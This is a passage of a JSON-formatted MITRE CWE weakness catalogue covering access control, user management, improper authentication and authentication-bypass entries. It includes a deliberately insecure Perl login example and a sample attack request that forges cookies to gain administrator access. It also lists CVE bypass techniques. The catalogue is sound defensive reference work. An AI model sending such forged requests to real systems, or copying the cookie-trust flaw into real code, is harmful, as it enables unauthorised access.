Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-24","Modification_Importance":"Critical","Modification_Comment":"Changed name and description; clarified difference between \\"access control\\" and \\"authorization.\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Missing or Inconsistent Access Control","attr":{"@_Date":"2009-01-12"}},{"#text":"Improper Access Control (Authorization)","attr":{"@_Date":"2011-03-29"}}]}},"286":{"attr":{"@_ID":"286","@_Name":"Incorrect User Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly manage a user within its environment.","Extended_Description":"Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"User management errors"}},"Notes":{"Note":[{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}},{"#text":"This item needs more work. Possible sub-categories include: user in wrong group, and user with insecure profile or \\"configuration\\". It also might be better expressed as a category than a weakness.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"User Management Issues","attr":{"@_Date":"2008-09-09"}}}},"287":{"attr":{"@_ID":"287","@_Name":"Improper Authentication","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"authentification","Description":"An alternate term is \\"authentification\\", which appears to be most commonly used by people from non-English-speaking countries."},{"Term":"AuthN","Description":"\\"AuthN\\" is typically used as an abbreviation of \\"authentication\\" within the web application security community. It is also distinct from \\"AuthZ,\\" which is an abbreviation of \\"authorization.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."},{"Term":"AuthC","Description":"\\"AuthC\\" is used as an abbreviation of \\"authentication,\\" but it appears to used less frequently than \\"AuthN.\\""}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Read Application Data","Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting certain types of authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries.","Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives."]},"Effectiveness":"Limited"},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Static Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Manual static analysis is useful for evaluating the correctness of custom authentication mechanisms."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an authentication framework or library such as the OWASP ESAPI Authentication feature."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code intends to ensure that the user is already logged in. If not, the code performs authentication with the user-provided username and password. If successful, it sets the loggedin and user cookies to \\"remember\\" that the user has already logged in. Finally, the code performs administrator tasks if the logged-in user has the \\"Administrator\\" username, as recorded in the user cookie.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $q = new CGI;if ($q->cookie(\'loggedin\') ne \\"true\\") {}if ($q->cookie(\'user\') eq \\"Administrator\\") {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (! AuthenticateUser($q->param(\'username\'), $q->param(\'password\'))) {}else {}","xhtml:div":[{"#text":"ExitError(\\"Error: you need to log in first\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"# Set loggedin and user cookies.$q->cookie($q->cookie(","xhtml:br":["",""],"xhtml:div":[{"#text":"-name => \'loggedin\',-value => \'true\');","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"-name => \'user\',-value => $q->param(\'username\'));","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}],"xhtml:br":""}},{"#text":"DoAdministratorTasks();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"GET /cgi-bin/vulnerable.cgi HTTP/1.1Cookie: user=AdministratorCookie: loggedin=true[body of request]","xhtml:br":["","","",""]}}],"Body_Text":["Unfortunately, this code can be bypassed. The attacker can set the cookies independently so that the code does not check the username and password. The attacker could do this with an HTTP request containing headers such as:","By setting the loggedin cookie to \\"true\\", the attacker bypasses the entire authentication check. By using the \\"Administrator\\" value in the user cookie, the attacker also gains privileges to administer the software."]},{"attr":{"@_Demonstrative_Example_ID":"DX-117"},"Intro_Text":"In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter\'s support team and was able to successfully guess the member\'s password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-236"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3421","Description":"login script for guestbook allows bypassing authentication by setting a \\"login_ok\\" parameter to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3421"},{"Reference":"CVE-2009-2382","Description":"admin script allows authentication bypass by setting a cookie value to \\"LOGGEDIN\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2382"},{"Reference":"CVE-2009-1048","Description":"VOIP product allows authentication bypass using 127.0.0.1 in the Host header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048"},{"Reference":"CVE-2009-2213","Description":"product uses default \\"Allow\\" action, instead of default deny, leading to authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-2168","Description":"chain: redirect without exit (CWE-698) leads to resultant authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2168"},{"Reference":"CVE-2009-3107","Description":"product does not restrict access to a listening port for a critical service, allowing authentication to be bypassed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3107"},{"Reference":"CVE-2009-1596","Description":"product does not properly implement a security-related configuration setting, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1596"},{"Reference":"CVE-2009-2422","Description":"authentication routine returns \\"nil\\" instead of \\"false\\" in some situations, allowing authentication bypass using an invalid username.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2422"},{"Reference":"CVE-2009-3232","Description":"authentication update script does not properly handle when admin does not select any authentication modules, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3232"},{"Reference":"CVE-2009-3231","Description":"use of LDAP authentication with anonymous binds causes empty password to result in successful authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3231"},{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Functional_Areas":{"Functional_Area":"Authentication"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Error"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":1,"Entry_Name":"Insufficient Authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"114"}},{"attr":{"@_CAPEC_ID":"115"}},{"attr":{"@_CAPEC_ID":"151"}},{"attr":{"@_CAPEC_ID":"194"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"593"}},{"attr":{"@_CAPEC_ID":"633"}},{"attr":{"@_CAPEC_ID":"650"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-237"}},{"attr":{"@_External_Reference_ID":"REF-238"}},{"attr":{"@_External_Reference_ID":"REF-239"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, "Authentication" Page 109"}}]},"Notes":{"Note":{"#text":"This can be resultant from SQL injection vulnerabilities and other issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Authentication Issues","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Authentication","attr":{"@_Date":"2009-01-12"}}]}},"288":{"attr":{"@_ID":"288","@_Name":"Authentication Bypass Using an Alternate Path or Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product requires authentication, but the product has an alternate path or channel that does not require authentication.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"420","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"425","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Architecture and Design","Note":"This is often seen in web applications that assume that access to a particular CGI program can only be obtained through a \\"front\\" screen, when the supporting programs are directly accessible. But this problem is not just in web apps."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1179","Description":"Router allows remote attackers to read system logs without authentication by directly connecting to the login screen and typing certain control characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1179"},{"Reference":"CVE-1999-1454","Description":"Attackers with physical access to the machine may bypass the password prompt by pressing the ESC (Escape) key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1454"},{"Reference":"CVE-1999-1077","Description":"OS allows local attackers to bypass the password protection of idled sessions via the programmer\'s switch or CMD-PWR keyboard sequence, which brings up a debugger that the attacker can use to disable the lock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1077"},{"Reference":"CVE-2003-0304","Description":"Direct request of installation file allows attacker to create administrator accounts.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0304"},{"Reference":"CVE-2002-0870","Description":"Attackers may gain additional privileges by directly requesting the web management URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0870"},{"Reference":"CVE-2002-0066","Description":"Bypass authentication via direct request to named pipe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066"},{"Reference":"CVE-2003-1035","Description":"User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass by Alternate Path/Channel"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"665"}}]},"Notes":{"Note":{"#text":"overlaps Unprotected Alternate Channel","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Modes_of_Introduction, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Authentication Bypass by Alternate Path/Channel","attr":{"@_Date":"2008-09-09"}}}},"289":{"attr":{"@_ID":"289","@_Name":"Authentication Bypass by Alternate Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable 